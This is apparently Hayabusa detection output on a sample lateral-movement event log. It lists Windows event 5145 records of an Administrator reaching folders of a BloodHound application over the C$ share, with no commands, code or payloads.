2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
